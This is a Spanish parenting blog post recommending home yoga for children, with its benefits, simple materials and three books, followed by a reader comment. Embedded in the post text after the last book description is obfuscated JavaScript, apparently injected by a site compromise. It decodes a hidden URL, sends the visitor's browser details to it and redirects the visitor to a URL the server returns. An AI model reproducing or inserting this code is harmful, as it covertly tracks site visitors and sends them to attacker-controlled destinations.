Yoga para hacer con niños en casa

Sabemos que el movimiento y el ejercicio es fundamental para el desarrollo de los niños, y quizás por eso, siempre buscamos para ellos una extraescolar relacionada con la actividad física: ballet, patinaje, piscina, fútbol, judo, gimnasia rítmica… Lo buscamos, a ser posible, dentro de nuestro centro escolar e inmediatamente después del colegio, para que nos dé tiempo a nosotras a llegar a recogerles sin tener que contratar a nadie, o segunda opción, vamos a por ellos y, a la carrera, les dejamos en su extraescolar mientras nos tomamos un café con el resto de madres y/o padres o nos vamos a hacer la compra. Y te preguntarás, ¿qué nos quiere contar esta mujer hoy con tanto rollo? Simplemente quería describir el día a día de muchos padres y quizás animaros a que en casa montéis vuestra propia extraescolar a la que ambos, mayores y pequeños, saquéis beneficios. Hablo de hacer Yoga en vuestro salón, y para ello he recurrido a la ayuda de Victoria Maganto Iniesta, experta en yoga para niños, quien me ha asesorado sobre cómo llevarlo a cabo de una manera muy sencilla.

¿En qué puede ayudar el yoga a nuestros hijos?

Captura de pantalla 2016-04-22 a la(s) 15.23.40Para Vito, los beneficios de practicar esta disciplina son múltiples  para todos:
Es una herramienta muy útil para la gestión de las emociones.
Trabaja estiramientos y respiración.
Mejora la concentración y estimula la imaginación.
Sube la autoestima.
Favorecen el sueño.
Aumenta el sentimiento de pertenencia y aceptación dentro de un grupo.
Trabaja el equilibrio y las habilidades físicas.
Si se practica en familia, fomenta la comunicación y el respeto entre todos.
Y, por último, mantiene los huesos sanos, fuertes y correctamente alineados, y los músculos que los envuelven flexibles como la plastilina. Aporta conciencia postural, tan importante para sus largas jornadas escolares.

¿Qué necesito para hacer yoga con mis hijos?
Captura de pantalla 2016-04-22 a la(s) 12.46.34
Sí, todo lo dicho anteriormente suena muy bonito, pero ahora surge la duda de cómo llevarlo a cabo. Por eso, lo primero que nos dice Vito es que tenemos que tener mucha imaginación y ganas de pasarlo bien. “Solo con sus juguetes, pegatinas y algunos materiales de plástica podemos inventar infinidad de sesiones con nuestros hijos”.  Por ejemplo, marionetas o peluches que pueden ser los acompañantes, narradores o guías de la actividad; pelotas para que jueguen a pasarla rodando por el suelo para desearos cosas buenas o para hacerse un masaje con ella;  cuerdas, lanas o gomas que hagan de frontera, puente o cable de comunicación; globos (según las edades) con los que se puede trabajar la respiración al inflarlos, la concentración  para que no toquen el suelo o crear un árbol de globos; pegatinas de colores, que pueden resultar muy divertidas y útiles si las utilizamos para señalar el centro del entrecejo en un momento de relax, por ejemplo. Para los más

pequeños, les puede servir para distinguir derecha e izquierda en los ejercicios; mandalas, que se pueden rellenar o pintar después de la sesión para ayudarles a a exteriorizar su estado de ánimo y crear un ambiente de concentración y comunicación a través del dibujo (en internet encontrarás muchísimos diseños adaptados a diferentes edades) y, para terminar, cuentos, muy recomendables al finalizar la sesión.

¡Comenzamos!
Ya lo tengo todo, ¿por dónde empiezo? Hay miles de ejercios y posturas que podéis practicar, pero si queréis seguir algún tipo de guía, os recomiendo tres libros a los que yo ya tengo echado el ojo y que, a su vez, me ha recomendado esta profesora de yoga especializada en peques.

Captura de pantalla 2016-04-22 a la(s) 12.40.53Eduyoga

Es un juego de yoga que se presenta en formato de fichas con la fotografía de la asana (postura) que queremos practicar y un dibujo de lo que estamos simulando. También encontramos ejercicios de respiración y varias opciones de juego. Muy recomendable.

Captura de pantalla 2016-04-22 a la(s) 12.41.32Yoga para llevar

Muy interesante para iniciar la práctica con niños. Sencillo y adaptado.

 

61nBSp8jp7LYoga para pequeños exploradores

A través de este cuento interactivo practicarás yoga con tus hijos en casa. ¡Les encantará y a ti también! var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

2 comentarios en “Yoga para hacer con niños en casa

  1. Es una de las cosas que quiero hacer con los niños en cuanto me sea posible. También tengo echado el ojo a algún libro al respecto! Tengo la duda de si Teresa es aún demasiado pequeña…

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *